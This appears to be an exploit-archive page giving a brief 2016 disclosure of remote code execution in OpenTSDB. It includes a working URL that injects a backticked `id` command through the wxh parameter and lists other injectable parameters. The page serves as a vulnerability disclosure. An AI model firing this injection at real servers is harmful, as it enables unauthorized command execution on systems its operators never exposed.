OpenTSDB Remote Code Execution

OpenTSDB Remote Code Execution: Posted Apr 21, 2016; Authored by gsoc; OpenTSDB suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | ef629a5afda4799864a0738de815ff969d73a1592c4e3b2c08cc18011241292a; Download | Favorite | View

OpenTSDB Remote Code Execution


The paramenter wxh needs some sanitation before being used by opentsdb.

See example url:

http://opentsdb.com:4242/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60id%60&style=linespoint&png

Results in RCE unfortunately

More parameters:

    wxh
    start
    m
    o
    key
    style

Payload:
%60id%60

Affects all current versions of opentsdb.

Top Authors In Last 30 Days

Red Hat 174 files
Ubuntu 65 files
malvuln 48 files
Apple 8 files
nu11secur1ty 7 files
Ahmed Alroky 6 files
Google Security Research 6 files
Mariam Tariq 4 files
Hassan Khan Yusufzai 4 files
Saud Alenazi 4 files

File Archives

Systems

AIX (426)
Apple (1,883)
BSD (368)
CentOS (55)
Cisco (1,912)
Debian (5,948)
Fedora (1,690)
FreeBSD (1,241)
Gentoo (4,152)
HPUX (878)
iOS (318)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (42,118)
Mac OS X (683)
Mandriva (3,105)
NetBSD (255)
OpenBSD (478)
RedHat (11,501)
Slackware (941)
Solaris (1,607)
SUSE (1,444)
Ubuntu (7,796)
UNIX (9,062)
UnixWare (185)
Windows (6,406)
Other

OpenTSDB Remote Code Execution

OpenTSDB Remote Code Execution

File Archive:

May 2022

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenTSDB Remote Code Execution

Share This

OpenTSDB Remote Code Execution

File Archive:

May 2022

Top Authors In Last 30 Days

File Tags

File Archives

Systems